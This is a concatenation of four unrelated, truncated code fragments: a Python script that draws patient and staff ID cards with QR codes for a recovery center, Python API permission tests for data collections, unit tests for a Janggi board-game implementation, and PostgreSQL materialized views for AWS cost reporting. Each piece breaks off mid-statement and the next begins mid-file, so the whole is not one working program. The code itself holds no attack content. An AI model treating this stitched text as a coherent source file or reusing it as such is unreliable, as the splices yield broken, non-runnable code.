<reponame>rdass1/IDScanningSystem from distutils.log import error from PIL import Image, ImageDraw, ImageFont, ImageOps import qrcode import random import sys import json from datetime import datetime from os.path import exists import time blankIDCardFront = "./server/idCreator/Slide1.PNG" # Link to the template of the front side of the ID blankIDCardBack = "./server/idCreator/Slide2.PNG" # Link to the template of the back side of the ID IDCARD_WIDTH = 1020 # Constant pixel width of an ID Card IDCARD_HEIGHT = 685 # Constant pixel height of an ID Card fontFile = "./server/idCreator/Calibri Regular.ttf" # Link to text file that will be used on the ID card # Note that the template should have a height of a multiple of: 205 for best effects # Note that the template should have a width of a multiple of: 325 for best effects def create_cardfront(holder_name, holder_id, holder_role, holder_ISS, holder_DOB, holder_gender, holder_pronouns, holder_height, holder_eyecolor, holder_haircolor, quote, holder_pic): template = Image.open(blankIDCardFront) # Opens the template of the ID card picTopLeft = [int(template.width*(15/325)), int(template.height*(60/205))] # sets the top left of the picture to (x,y) cooridnates picBotRight = [int(template.width*(130/325)), int(template.height*(176/205))] # sets the bottom right of the picture to (x,y) coordinates dx = picBotRight[0] - picTopLeft[0] # Find the difference between the bottom and top coordinate dy = picBotRight[1] - picTopLeft[1] # Find the difference between the right and left coordinate temp_pic = Image.open("./server/idCreator/johndoepic.jpg") try: if(exists(holder_pic)): time.sleep(1) temp_pic = Image.open(holder_pic).convert("RGB") temp_pic = ImageOps.exif_transpose(temp_pic) else: print("Picture doesn't exist\nCreating ID with default image...") except: print("Invalid Picture Input") temp_pic = Image.open("./server/idCreator/johndoepic.jpg") cropped_HolderPic = temp_pic errorMargin = cropped_HolderPic.width / cropped_HolderPic.height if(errorMargin < 1 or errorMargin > 2): print(errorMargin) if cropped_HolderPic.height > cropped_HolderPic.width: cropped_HolderPic = cropped_HolderPic.crop((0, cropped_HolderPic.width/4, cropped_HolderPic.width, cropped_HolderPic.height - cropped_HolderPic.width/4)) # #Make Height equal to width elif cropped_HolderPic.height < cropped_HolderPic.width: cropped_HolderPic = cropped_HolderPic.crop((cropped_HolderPic.height/4, 0, cropped_HolderPic.width- cropped_HolderPic.height/4, cropped_HolderPic.height)) # #Make Width equal to height id_pic = cropped_HolderPic.resize((dx, dy), Image.ANTIALIAS) # resize the picture to the dimensions specified by the dy & dx template.paste(id_pic, (picTopLeft[0], picTopLeft[1], picBotRight[0], picBotRight[1])) # place the resized image onto the area between the coordinates picTopLeft & picBotRight draw = ImageDraw.Draw(template) # Draw the new template. font = ImageFont.truetype(fontFile, int(template.height*(9/205))) # The fontFile is the font chosen, then the size of the font maxCharperLine = 69 count = 0 newquote = "" words = str.split(quote, " ") for word in words: count += len(word) if count > maxCharperLine: newquote += "\n" count = 0 newquote += word + " " draw.text((int(template.width*(15/325)),int(template.height*(180/205))), newquote, fill='black', font=font) font = ImageFont.truetype(fontFile, int(template.height*(12/205))) # The fontFile is the font chosen, then the size of the font lstCardInfo = [holder_name, # The holder name holder_id, # The holder's id holder_role, # The holder's role "ISS: " + holder_ISS, # The issue date of the ID "DOB: " + holder_DOB, # The holder's date of birth "GENDER: " + holder_gender, # The holder's gender "PRONOUNS: " + holder_pronouns, # The holder's pronouns "HGT: " + holder_height, # The holder's height "EYES: "+ holder_eyecolor, # The holder's eye color "HAIR: " + holder_haircolor] # The holder's hair color coordX_cardInfo = int(template.width*(140/325)) # Starting point for column 1 of the cardInfo as a X coordinate coordY_cardInfo_start = int(template.height*(60/205)) # Starting point for the cardInfo as a Y coordinate coordY_cardInfo_inc = int(template.height*(17/205)) # The spacing between each line of text lstCardBlanks = ["", # List of blank statements (null string) "ISS: ", # ISS was left as a null string "DOB: ", # DOB was left as a null string "GENDER: ", # Gender was left as a null string "PRONOUNS: ", # Pronouns was left as a null string "HGT: ", # Height as a null string "EYES: ", # Eye color as a null string "HAIR: "] # Hair color as a null string coordY_cardInfo_current = coordY_cardInfo_start for ele in lstCardInfo: isBlank = False for con in lstCardBlanks: if(ele == con): isBlank = True break if not isBlank: draw.text((coordX_cardInfo, coordY_cardInfo_current), ele, fill='black', font=font) # Writes each line of text on the ID card coordY_cardInfo_current += coordY_cardInfo_inc # increments the current y-coordinate by the coordY_cardInfo if coordY_cardInfo_current >= coordY_cardInfo_start + 7*coordY_cardInfo_inc: coordX_cardInfo = int(template.width*(230/325)) coordY_cardInfo_current = int(template.height*(94/205)) myFill = "#FFFFFF" # Color fill initially white if holder_role == "Patient": myFill = "#FE6100" # Orange elif holder_role == "Alumni": myFill = "#DC267F" # Pink elif holder_role == "Employee": myFill = "#648FFF" # Blue elif holder_role == "Admin": myFill = "#648FFF" elif holder_role == "Volunteer": myFill = "#785EF0" # Purple else: print("Invalid Role") draw.rectangle([(0, 0),(int(template.width*(12/325)), int(template.height))], fill=myFill) # Draws the rectangle to indicate which role the user is return template # Returns the edited card def create_cardback(id): template = Image.open(blankIDCardBack) # Opens the template of the ID card qrTopLeft = [template.width*(18/325), template.height*(8/205)] # Specifies the top left coordinates of the QR code qrBotRight = [template.width*(132/325), template.height*(122/205)] # Specifies the bottom right coordinate of the QR code dx = int(qrBotRight[0]) - int(qrTopLeft[0]) # Find the difference between the right and left points dy = int(qrBotRight[1]) - int(qrTopLeft[1]) # Find the difference between the bottom and top points qr = qrcode.QRCode(error_correction=qrcode.ERROR_CORRECT_H, box_size=15, version=1, border=2) # creates a QR code qr.add_data(id) # Adds the id card's information to the QR code qr.make(fit=True) qrimg = qr.make_image(fill_color="black", back_color="white").resize((int(dx), int(dy))) # sets the qrcode's image to white and black pos = (int(qrTopLeft[0]), int(qrTopLeft[1]), int(qrBotRight[0]), int(qrBotRight[1])) # places the qr code's position to the points qrTopLeft & qrBotRight template.paste(qrimg, pos) # pastes the qr code's image on the id card draw = ImageDraw.Draw(template) # Draw the new template. text_Lost = "If lost return to:\n 2942 W Lake Street\n Chicago, IL, 60612\nor Call:\n (773)940-2960\nduring normal business hours." text_HIPAA = "Above and Beyond Family Recovery Center presents this\ninformation as it is recorded in our Electronic Health Record\nHIPAA Compliant Federally Mandated Licensing Requirement\nand bears no responsibility as to any accuracy of content. Call\n773.690.2960 for further assistance during normal business\nhours." font = ImageFont.truetype(fontFile, int(template.height*(14/205))) draw.text((int(template.width*(150/325)),int(template.height*(28/205))), text_Lost, fill='black', font=font) font = ImageFont.truetype(fontFile, int(template.height*(12/205))) draw.text((int(template.width*(10/325)),int(template.height*(130/205))), text_HIPAA, fill='black', font=font) return template def saveFrontID(name, id, role, issue_date, date_of_birth, gender, pronouns, height, eyecolor, haircolor, quote, pic, save_locale): idcard = create_cardfront(name, id, role, issue_date, date_of_birth, gender, pronouns, height, eyecolor, haircolor, quote, pic) # Creates the front side of the ID card idcard.thumbnail((IDCARD_WIDTH, IDCARD_HEIGHT), Image.ANTIALIAS) # Resizes the image to the correct widths idcard.save(save_locale) # Saves the front side of the ID card to a specified location def saveBackID(id, save_locale): idcard = create_cardback(id) # creates the front side of the ID card idcard.thumbnail((IDCARD_WIDTH, IDCARD_HEIGHT), Image.ANTIALIAS) # Resizes the image to the correct widths idcard.save(save_locale) # Saves the back side of the ID card to a specified location def saveID(name, id, role, issue_date, date_of_birth, gender, pronouns, height, eyecolor, haircolor, quote, pic, save_frontlocale, save_backlocale): saveFrontID(name, id, role, issue_date, date_of_birth, gender, pronouns, height, eyecolor, haircolor, quote, pic, save_frontlocale) # creates and saves the front side of the ID card saveBackID(id, save_backlocale) # creates and saves the back side of the ID card def randomQuote(): lst_quote = ["", "“Insanity is doing the same thing, over and over again, but expecting different results.” ―Narcotics Anonymous", "“It's not recovery that is painful; our resistance to it is what hurts.” ―Narcotics Anonymous, Living Clean: The Journey Continues", "“By keeping an open mind, sooner or later, we find the help we need.” ―Narcotics Anonymous Fellowship, Narcotics Anonymous", "“We may not have it all together, but together we can have it all!” -Wookiefoot", "“Success consists of going from failure to failure without loss of enthusiasm.” -<NAME>", "“Somebody has to start. Somebody has to step forward and do what is right, because it is right.” -Kaladin, in The Way of Kings by <NAME>", "“I am an immigrant to reality.” -Author unknown", "“The world is not the problem! it's how we see it” -Author unknown", "“You are the sky. Everything else is just the weather.” -<NAME>"] # list of quotes provided by the design team that would fit on the ID card return lst_quote[random.randint(0,len(lst_quote)-1)] def paperPrintableIDNew(name, id, role, issue_date, date_of_birth, gender, pronouns, height, eyecolor,
"""Tests for collection requests.""" import uuid import requests # avoid pylint errors because of fixtures # pylint: disable = redefined-outer-name, unused-import from helpers import ( TEST_LABEL, USERS, as_user, collection_for_tests, make_request, make_request_all_roles, mdb, random_string, ) import helpers import utils def test_list_collections(mdb): """Request a list of all collections.""" responses = make_request_all_roles("/api/v1/collection", ret_json=True) for response in responses: assert response.code == 200 assert len(response.data["collections"]) == mdb["collections"].count_documents({}) assert set(response.data["collections"][0].keys()) == { "id", "title", "tags", "properties", } def test_add_collection_permissions(): """ Test permissions for adding a collection. * Any user with ``DATA_EDIT`` can add a collection """ indata = {"collection": {"title": "Test add permissions title"}} indata["collection"].update(TEST_LABEL) responses = make_request_all_roles( "/api/v1/collection", method="POST", data=indata, ret_json=True ) for response in responses: if response.role in ("edit", "data", "root"): assert response.code == 200 assert "id" in response.data assert len(response.data["id"]) == 38 elif response.role == "no-login": assert response.code == 401 assert not response.data else: assert response.code == 403 assert not response.data def test_add_collection_data(mdb): """ Test the functionality for adding collections. Checks: * fields are set correctly * logs are created * logs contain the relevant data """ ds_id = next(mdb["datasets"].aggregate([{"$sample": {"size": 1}}]))["_id"] order_info = mdb["orders"].find_one({"datasets": ds_id}) user_info = mdb["users"].find_one({"_id": {"$in": order_info["editors"]}}) session = requests.Session() as_user(session, user_info["auth_ids"][0]) # add data indata = { "collection": { "description": "Test description", "editors": [str(user_info["_id"])], "title": "Test add title", "datasets": [str(ds_id)], "tags": [], "properties": {"Source": "Added from test"}, } } indata["collection"].update(TEST_LABEL) response = make_request( session, "/api/v1/collection", method="POST", data=indata, ret_json=True ) assert response.code == 200 assert "id" in response.data assert len(response.data["id"]) == 38 added_id = response.data["id"] # validate added data collection = mdb["collections"].find_one({"_id": added_id}) utils.prepare_response(collection) for field in ("editors", "datasets"): collection[field] = [str(entry) for entry in collection[field]] for field in indata["collection"]: assert collection[field] == indata["collection"][field] # validate log log_query = { "data._id": added_id, "data_type": "collection", "user": user_info["_id"], "action": "add", } log_entry = mdb["logs"].find_one(log_query) assert log_entry for field in ("editors", "datasets"): log_entry["data"][field] = [str(entry) for entry in log_entry["data"][field]] print(log_entry, indata) for field in indata["collection"]: assert log_entry["data"][field] == indata["collection"][field] def test_add_collection_bad(): """ Perform bad add collection attempts. * no {collection: {...} } * empty title * no data (no collection) * no data * list instead of object * incorrect field name * incorrect editor uuid * attempt to set ``_id`` * bad dataset uuid """ indata = {"title": "a title"} responses = make_request_all_roles( "/api/v1/collection", method="POST", data=indata, ret_json=True ) for response in responses: if response.role == "no-login": assert response.code == 401 assert not response.data elif response.role in ("root", "edit", "data"): assert response.code == 400 assert not response.data else: assert response.code == 403 assert not response.data indata = {"collection": {"title": ""}} responses = make_request_all_roles( "/api/v1/collection", method="POST", data=indata, ret_json=True ) for response in responses: if response.role == "no-login": assert response.code == 401 assert not response.data elif response.role in ("root", "edit", "data"): assert response.code == 400 assert not response.data else: assert response.code == 403 assert not response.data responses = make_request_all_roles("/api/v1/collection", method="POST", ret_json=True) for response in responses: if response.role == "no-login": assert response.code == 401 assert not response.data elif response.role in ("root", "edit", "data"): assert response.code == 400 assert not response.data else: assert response.code == 403 assert not response.data indata = {"collection": {}} responses = make_request_all_roles( "/api/v1/collection", method="POST", data=indata, ret_json=True ) for response in responses: if response.role == "no-login": assert response.code == 401 assert not response.data elif response.role in ("root", "edit", "data"): assert response.code == 400 assert not response.data else: assert response.code == 403 assert not response.data indata = {"collection": []} responses = make_request_all_roles( "/api/v1/collection", method="POST", data=indata, ret_json=True ) for response in responses: if response.role == "no-login": assert response.code == 401 assert not response.data elif response.role in ("root", "edit", "data"): assert response.code == 400 assert not response.data else: assert response.code == 403 assert not response.data indata = {"bad_field": "content", "title": "title"} responses = make_request_all_roles( "/api/v1/collection", method="POST", data=indata, ret_json=True ) for response in responses: if response.role == "no-login": assert response.code == 401 assert not response.data elif response.role in ("root", "edit", "data"): assert response.code == 400 assert not response.data else: assert response.code == 403 assert not response.data indata = { "collection": { "description": "Test bad add description", "editors": [str(uuid.uuid4())], "title": "Test bad add title", } } responses = make_request_all_roles( "/api/v1/collection", method="POST", data=indata, ret_json=True ) for response in responses: if response.role == "no-login": assert response.code == 401 assert not response.data elif response.role in ("root", "edit", "data"): assert response.code == 400 assert not response.data else: assert response.code == 403 assert not response.data session = requests.Session() as_user(session, USERS["data"]) indata = {"collection": {"_id": str(uuid.uuid4()), "title": "Test bad add title"}} response = make_request( session, "/api/v1/collection", method="POST", data=indata, ret_json=True ) assert response.code == 403 assert not response.data indata = {"collection": {"datasets": [str(uuid.uuid4())], "title": "Test bad add title"}} response = make_request( session, "/api/v1/collection", method="POST", data=indata, ret_json=True ) assert response.code == 400 def test_get_collection_permissions(mdb): """Test permissions for requesting a collection.""" collection = list(mdb["collections"].aggregate([{"$sample": {"size": 1}}]))[0] responses = make_request_all_roles(f'/api/v1/collection/{collection["_id"]}', ret_json=True) for response in responses: assert response.code == 200 def test_get_collection(mdb): """ Request multiple collections by uuid, one at a time. * Normal collection * Collection as editor; confirm that the user gets the editors field * Collection as DATA_MANAGEMENT; confirm that the user gets the editors field """ session = requests.Session() for _ in range(3): # Get a random collection, use external data structure collection = list(mdb["collections"].aggregate([{"$sample": {"size": 1}}]))[0] utils.prepare_response(collection) proj_owner = mdb["users"].find_one({"_id": {"$in": collection["editors"]}}) collection["id"] = str(collection["id"]) collection["editors"] = [str(entry) for entry in collection["editors"]] collection["datasets"] = [str(entry) for entry in collection["datasets"]] as_user(session, USERS["base"]) response = make_request(session, f'/api/v1/collection/{collection["id"]}') assert response.code == 200 for field in collection: if field == "datasets": for i, ds_uuid in enumerate(collection[field]): assert ds_uuid == response.data["collection"][field][i]["id"] elif field == "editors": continue else: assert collection[field] == response.data["collection"][field] as_user(session, proj_owner["auth_ids"][0]) response = make_request(session, f'/api/v1/collection/{collection["id"]}') assert response.code == 200 for field in collection: if field in ("datasets", "editors"): entries = [entry["id"] for entry in response.data["collection"][field]] assert len(collection[field]) == len(entries) for i, ds_uuid in enumerate(collection[field]): assert ds_uuid in entries else: assert collection[field] == response.data["collection"][field] as_user(session, USERS["root"]) response = make_request(session, f'/api/v1/collection/{collection["id"]}') assert response.code == 200 for field in collection: if field in ("datasets", "editors"): entries = [entry["id"] for entry in response.data["collection"][field]] assert len(collection[field]) == len(entries) for i, ds_uuid in enumerate(collection[field]): assert ds_uuid in entries else: assert collection[field] == response.data["collection"][field] def test_get_collection_bad(): """ Request collections using bad identifiers. All are expected to return 404. """ session = requests.Session() for _ in range(2): response = make_request(session, f"/api/v1/collection/{uuid.uuid4()}") assert response.code == 404 assert not response.data for _ in range(2): response = make_request(session, f"/api/v1/collection/{random_string()}") assert response.code == 404 assert not response.data def test_update_collection_permissions(mdb, collection_for_tests): """ Confirm that only the intended users can update collections. Checks: * DATA_MANAGEMENT can edit any collection * DATA_EDIT and listed in editors required * Listed in editors, not DATA_EDIT - forbidden * DATA_EDIT, not listed in editors - forbidden """ session = requests.Session() coll_id = collection_for_tests helpers.as_user(session, USERS["data"]) indata = {"collection": {"title": "Update any", "editors": helpers.users_uuids()}} response = helpers.make_request( session, f"/api/v1/collection/{coll_id}", method="PATCH", data=indata, ret_json=True, ) assert response.code == 200 assert not response.data new_collection = mdb["collections"].find_one({"_id": coll_id}) assert new_collection["title"] == "Update any" assert [str(entry) for entry in new_collection["editors"]] == helpers.users_uuids() for role in USERS: helpers.as_user(session, USERS[role]) indata = {"collection": {"title": f"Test title - updated by {role}"}} response = helpers.make_request( session, f"/api/v1/collection/{coll_id}", method="PATCH", data=indata, ret_json=True, ) if role in ("edit", "data", "root"): assert response.code == 200 assert not response.data new_collection = mdb["collections"].find_one({"_id": coll_id}) assert new_collection["title"] == f"Test title - updated by {role}" elif role == "no-login": assert response.code == 401 assert not response.data else: assert response.code == 403 assert not response.data mdb["collections"].update_one({"_id": coll_id}, {"$set": {"editors": []}}) print(mdb["collections"].find_one({"_id": coll_id})) helpers.as_user(session, USERS["edit"]) indata = {"collection": {"title": "Test title - updated by edit"}} response = helpers.make_request( session, f"/api/v1/collection/{coll_id}", method="PATCH", data=indata, ret_json=True, ) assert response.code == 403 assert not response.data new_collection = mdb["collections"].find_one({"_id": coll_id}) assert new_collection["title"] != indata["collection"]["title"] def test_update_collection_data(mdb, collection_for_tests): """ Confirm that all fields can be updated correctly. Checks: * Make update with no content -> 200 - Confirm that log was not created * Make update with all relevant fields changed -> 200 - Confirm that log was
place for eastern blue elephant g.make_move('e4', 'e5') # red soldier moves to make place for eastern red elephant try: valid_move = g.make_move('g10','e7') #blue elephant moves self.assertIs(valid_move, True) except: self.fail("Blue Elephant from east is either not transposed correctly with Horse in the inital setup or cannot perform valid moves") try: valid_move = g.make_move('g1','e4') #red elephant moves self.assertIs(valid_move, True) except: self.fail("Red Elephant from east is either not transposed correctly with Horse in the inital setup or cannot perform valid moves") # @visibility('after_due_date') def test_that_a_check_by_a_cannon_outside_the_palace_is_detected(self): """RULES: Check by a cannon outside the palace is detected""" g = JanggiGame() g.make_move('c7','c6') #blue g.make_move('c1','d3') #red g.make_move('b10','d7') #blue g.make_move('b3','e3') #red g.make_move('c10','d8') g.make_move('h1','g3') g.make_move('e7','e6') g.make_move('e3', 'e6') #red cannon captures soldier -- check here g.make_move('h8','c8') #blue cannon moves -- check here g.make_move('d3','e5') #red g.make_move('c8','c4') #blue cannon captures red soldier -- check here g.make_move('e5','c4') #red horse captures blue cannon g.make_move('i10','i8') #blue chariot moves g.make_move('g4','f4') g.make_move('i8','f8') #blue chariot moves sideway g.make_move('g3','h5') g.make_move('h10','g8') #blue horse self.assertTrue(g.make_move('e6','e3')) #red CHECKS blue using a cannon -- special test for checks using a cannon -- check here try: self.assertEqual(g.get_game_state().upper(),'UNFINISHED') except: self.fail("Game state should be UNFINISHED when a general is in check but not checkmated") try: self.assertIs(g.is_in_check('red'), False) except: self.fail("Red General is not in check and yet is_in_check returns True for red") try: self.assertIs(g.is_in_check('blue'), True) except: self.fail("Blue General is in check with a Cannon outside the palace and is_in_check should return True for blue") # @visibility('after_due_date') def test_that_a_check_by_a_horse_outside_the_palace_is_detected(self): """RULES: Check by a horse outside the palace is detected""" g = JanggiGame() g.make_move('c7','c6') #blue g.make_move('c1','d3') #red g.make_move('b10','d7') #blue g.make_move('b3','e3') #red g.make_move('c10','d8') g.make_move('h1','g3') g.make_move('e7','e6') g.make_move('e3', 'e6') #red cannon captures soldier -- check here g.make_move('h8','c8') #blue cannon moves -- check here g.make_move('d3','e5') #red g.make_move('c8','c4') #blue cannon captures red soldier -- check here g.make_move('e5','c4') #red horse captures blue cannon g.make_move('i10','i8') #blue chariot moves g.make_move('g4','f4') g.make_move('i8','f8') #blue chariot moves sideway g.make_move('g3','h5') g.make_move('h10','g8') #blue horse g.make_move('e6','e3') #red CHECKS blue using a cannon -- special test for checks using a cannon -- check here g.make_move('e9','d9') #blue general moves to counter check g.make_move('c4','b6') #red horse moves g.make_move('g7','f7') #blue soldier moves g.make_move('e4','e5') #red moves g.make_move('f7','e7') #blue moves g.make_move('e5','e6') #red moves g.make_move('d9','e9') #blue general moves g.make_move('b6','a8') #red horse moves southwest g.make_move('d8','b7') #blue horse moves g.make_move('a8','b10') #red horse moves g.make_move('e9','e9') #blue passes g.make_move('b10','c8') #red horse puts blue general in check try: self.assertEqual(g.get_game_state().upper(),'UNFINISHED') except: self.fail("Game state should be UNFINISHED when a general is in check but not checkmated") try: self.assertIs(g.is_in_check('red'), False) except: self.fail("Red General is not in check and yet is_in_check returns True for red") try: self.assertIs(g.is_in_check('blue'), True) except: self.fail("Blue General is in check with a Horse outside the palace and is_in_check should return True for blue") # @visibility('after_due_date') def test_that_countering_the_check_by_capturing_the_cannon_is_detected_correctly(self): """RULES: Countering the check by capturing the cannon is detected correctly""" g = JanggiGame() g.make_move('c7','c6') #blue g.make_move('c1','d3') #red g.make_move('b10','d7') #blue g.make_move('b3','b3') #red passes g.make_move('c10','d8') g.make_move('h1','g3') g.make_move('e7','e6') g.make_move('b3','b3') #red passes g.make_move('e6', 'f6') #blue soldier moves sidewways g.make_move('b3','b3') #red passes g.make_move('h8','c8') #blue cannon moves -- check here g.make_move('d3','e5') #red g.make_move('c8','c4') #blue cannon captures red soldier -- check here g.make_move('e5','c4') #red horse captures blue cannon g.make_move('i10','i8') #blue chariot moves g.make_move('g4','f4') g.make_move('i8','f8') #blue chariot moves sideway g.make_move('g3','h5') g.make_move('h10','g8') #blue horse g.make_move('d1','d2') #red moves g.make_move('e9','e9') #blue passes g.make_move('d2','d3') #red moves self.assertTrue(g.make_move('e9','e9')) #blue passes self.assertTrue(g.make_move('d3','d3')) #red passes #prep moves to kill the cannon in future self.assertTrue(g.make_move('g7','g6')) #blue soldier moves self.assertTrue(g.make_move('f4','g4')) #red soldier moves sideways self.assertTrue(g.make_move('f6','f5')) #blue soldier moves self.assertTrue(g.make_move('g4','g5')) #red soldier moves self.assertTrue(g.make_move('g8','f6')) #blue horse moves self.assertTrue(g.make_move('e2','e2')) #red passes self.assertTrue(g.make_move('f6','d5')) #blue horse moves self.assertTrue(g.make_move('b3','e3')) #red CHECKS blue using a cannon -- special test for checks using a cannon -- check here try: self.assertEqual(g.get_game_state().upper(),'UNFINISHED') except: self.fail("Game state should be UNFINISHED when a general is in check but not checkmated") try: self.assertIs(g.is_in_check('red'), False) except: self.fail("Red General is not in check and yet is_in_check returns True for red") try: self.assertIs(g.is_in_check('blue'), True) except: self.fail("Blue General is in check with a Cannon outside the palace and is_in_check should return True for blue") counter_check_move = g.make_move('d5','e3') #evade the cannon check by capturing the cannon using a horse self.assertTrue(counter_check_move) try: self.assertIs(g.is_in_check('red'), False) except: self.fail("Red General is not in check and yet is_in_check returns True for red") try: self.assertIs(g.is_in_check('blue'), False) except: self.fail("Countering of the check by cannon by capturing it should be detected correctly and is_in_check should return False for blue") try: self.assertEqual(g.get_game_state().upper(),'UNFINISHED') except: self.fail("Game state should be UNFINISHED when a general is in check but not checkmated") # @visibility('after_due_date') def test_that_countering_the_check_by_blocking_the_cannon_is_detected_correctly(self): """RULES: Countering the check by blocking the cannon is detected correctly""" g = JanggiGame() g.make_move('c7','c6') #blue g.make_move('c1','d3') #red g.make_move('b10','d7') #blue g.make_move('b3','b3') #red passes g.make_move('c10','d8') g.make_move('h1','g3') g.make_move('e7','e6') g.make_move('b3','b3') #red passes g.make_move('e6', 'f6') #blue soldier moves sidewways g.make_move('b3','b3') #red passes g.make_move('h8','c8') #blue cannon moves -- check here g.make_move('d3','e5') #red g.make_move('c8','c4') #blue cannon captures red soldier -- check here g.make_move('e5','c4') #red horse captures blue cannon g.make_move('i10','i8') #blue chariot moves g.make_move('g4','f4') g.make_move('i8','f8') #blue chariot moves sideway g.make_move('g3','h5') g.make_move('h10','g8') #blue horse g.make_move('d1','d2') #red moves g.make_move('e9','e9') #blue passes g.make_move('d2','d3') #red moves g.make_move('e9','e9') #blue passes self.assertTrue(g.make_move('b3','e3')) #red CHECKS blue using a cannon -- special test for checks using a cannon -- check here try: self.assertEqual(g.get_game_state().upper(),'UNFINISHED') except: self.fail("Game state should be UNFINISHED when a general is in check but not checkmated") try: self.assertIs(g.is_in_check('red'), False) except: self.fail("Red General is not in check and yet is_in_check returns True for red") try: self.assertIs(g.is_in_check('blue'), True) except: self.fail("Blue General is in check with a Cannon outside the palace and is_in_check should return True for blue") counter_check_move = g.make_move('f8','e8') #evade the cannon check by blocking the cannon using the chariot self.assertTrue(counter_check_move) try: self.assertIs(g.is_in_check('red'), False) except: self.fail("Red General is not in check and yet is_in_check returns True for red") try: self.assertIs(g.is_in_check('blue'), False) except: self.fail("Countering of the check by cannon by blocking it should be detected correctly and is_in_check should return False for blue") try: self.assertEqual(g.get_game_state().upper(),'UNFINISHED') except: self.fail("Game state should be UNFINISHED when a general is in check but not checkmated") # @visibility('after_due_date') def test_that_check_forces_a_move_to_be_made_to_counter_the_check(self): """RULES: Check forces a move to be made to counter the check""" g = JanggiGame() g.make_move('c7','c6') #blue g.make_move('c1','d3') #red g.make_move('b10','d7') #blue g.make_move('b3','b3') #red passes g.make_move('c10','d8') g.make_move('h1','g3') g.make_move('e7','e6') g.make_move('b3','b3') #red passes g.make_move('e6', 'f6') #blue soldier moves sidewways g.make_move('b3','b3') #red passes g.make_move('h8','c8') #blue cannon moves -- check here g.make_move('d3','e5') #red g.make_move('c8','c4') #blue cannon captures red soldier -- check here g.make_move('e5','c4') #red horse captures blue cannon g.make_move('i10','i8') #blue chariot moves g.make_move('g4','f4') g.make_move('i8','f8') #blue chariot moves sideway g.make_move('g3','h5') g.make_move('h10','g8') #blue horse g.make_move('d1','d2') #red moves g.make_move('e9','e9') #blue passes g.make_move('d2','d3') #red moves g.make_move('e9','e9') #blue passes self.assertTrue(g.make_move('b3','e3')) #red CHECKS blue using a cannon -- special test for checks using a cannon -- check here try: self.assertEqual(g.get_game_state().upper(),'UNFINISHED') except: self.fail("Game state should be UNFINISHED when a general is in check but not checkmated") try: self.assertIs(g.is_in_check('red'), False) except: self.fail("Red General is not in check and yet is_in_check returns True for red") try: self.assertIs(g.is_in_check('blue'), True) except: self.fail("Blue General is in check with a Cannon outside the palace and is_in_check should return True for blue") non_counter_check_move = g.make_move('f8','f7') #a move that does not evade the check try: self.assertFalse(non_counter_check_move) except: self.fail("Blue should be forced to make a move that evades a check when checked") non_counter_check_move = g.make_move('e9','e10') #general moves not countering the check try: self.assertFalse(non_counter_check_move) except: self.fail("Blue should be forced to make a move that evades a check when checked") non_counter_check_move = g.make_move('f6','f5') #soldier moves not countering the check try: self.assertFalse(non_counter_check_move) except: self.fail("Blue should be forced to make a move that evades a check when checked") # @visibility('after_due_date') def test_red_won(self): """RULES: Test that red win is detected correctly.""" g = JanggiGame() g.make_move('c7','c6') #blue g.make_move('c1','d3') #red g.make_move('b10','d7') #blue g.make_move('b3','e3') #red g.make_move('c10','d8') g.make_move('h1','g3') g.make_move('e7','e6') g.make_move('e3', 'e6') #red cannon captures soldier -- check here g.make_move('h8','c8') #blue moves -- check here g.make_move('d3','e5') #red g.make_move('c8','c4') #blue cannon captures red soldier -- check here g.make_move('e5','c4') #red horse captures blue cannon g.make_move('i10','i8') #blue chariot moves g.make_move('g4','f4') g.make_move('i8','f8') #blue chariot moves sideway g.make_move('g3','h5') g.make_move('h10','g8') #blue horse g.make_move('e6','e3') #red CHECKS blue using a cannon
ON reporting_aws_compute_summary (usage_start, instance_type) ; CREATE MATERIALIZED VIEW reporting_aws_compute_summary_by_service AS( SELECT row_number() OVER(ORDER BY date(usage_start), product_code, product_family, instance_type) as id, date(usage_start) as usage_start, date(usage_start) as usage_end, product_code, product_family, instance_type, array_agg(DISTINCT resource_id) as resource_ids, count(DISTINCT resource_id) as resource_count, sum(usage_amount) as usage_amount, max(unit) as unit, sum(unblended_cost) as unblended_cost, sum(markup_cost) as markup_cost, max(currency_code) as currency_code FROM reporting_awscostentrylineitem_daily_summary, unnest(resource_ids) resource_id -- Get data for this month or last month WHERE instance_type IS NOT NULL AND ( date_trunc('month', usage_start) = date_trunc('month', now()) OR date_trunc('month', usage_start) = date_trunc('month', date_trunc('month', now()) - INTERVAL '1' DAY) ) GROUP BY date(usage_start), product_code, product_family, instance_type ) ; CREATE UNIQUE INDEX aws_compute_summary_service ON reporting_aws_compute_summary_by_service (usage_start, product_code, product_family, instance_type) ; CREATE MATERIALIZED VIEW reporting_aws_compute_summary_by_account AS( SELECT row_number() OVER(ORDER BY date(usage_start), usage_account_id, account_alias_id, instance_type) as id, date(usage_start) as usage_start, date(usage_start) as usage_end, usage_account_id, account_alias_id, instance_type, array_agg(DISTINCT resource_id) as resource_ids, count(DISTINCT resource_id) as resource_count, sum(usage_amount) as usage_amount, max(unit) as unit, sum(unblended_cost) as unblended_cost, sum(markup_cost) as markup_cost, max(currency_code) as currency_code FROM reporting_awscostentrylineitem_daily_summary, unnest(resource_ids) resource_id -- Get data for this month or last month WHERE instance_type IS NOT NULL AND ( date_trunc('month', usage_start) = date_trunc('month', now()) OR date_trunc('month', usage_start) = date_trunc('month', date_trunc('month', now()) - INTERVAL '1' DAY) ) GROUP BY date(usage_start), usage_account_id, account_alias_id, instance_type ) ; CREATE UNIQUE INDEX aws_compute_summary_account ON reporting_aws_compute_summary_by_account (usage_start, usage_account_id, account_alias_id, instance_type) ; CREATE MATERIALIZED VIEW reporting_aws_compute_summary_by_region AS( SELECT row_number() OVER(ORDER BY date(usage_start), region, availability_zone, instance_type) as id, date(usage_start) as usage_start, date(usage_start) as usage_end, region, availability_zone, instance_type, array_agg(DISTINCT resource_id) as resource_ids, count(DISTINCT resource_id) as resource_count, sum(usage_amount) as usage_amount, max(unit) as unit, sum(unblended_cost) as unblended_cost, sum(markup_cost) as markup_cost, max(currency_code) as currency_code FROM reporting_awscostentrylineitem_daily_summary, unnest(resource_ids) resource_id -- Get data for this month or last month WHERE instance_type IS NOT NULL AND ( date_trunc('month', usage_start) = date_trunc('month', now()) OR date_trunc('month', usage_start) = date_trunc('month', date_trunc('month', now()) - INTERVAL '1' DAY) ) GROUP BY date(usage_start), region, availability_zone, instance_type ) ; CREATE UNIQUE INDEX aws_compute_summary_region ON reporting_aws_compute_summary_by_region (usage_start, region, availability_zone, instance_type) ; CREATE MATERIALIZED VIEW reporting_aws_storage_summary AS( SELECT row_number() OVER(ORDER BY date(usage_start), product_family) as id, date(usage_start) as usage_start, date(usage_start) as usage_end, product_family, 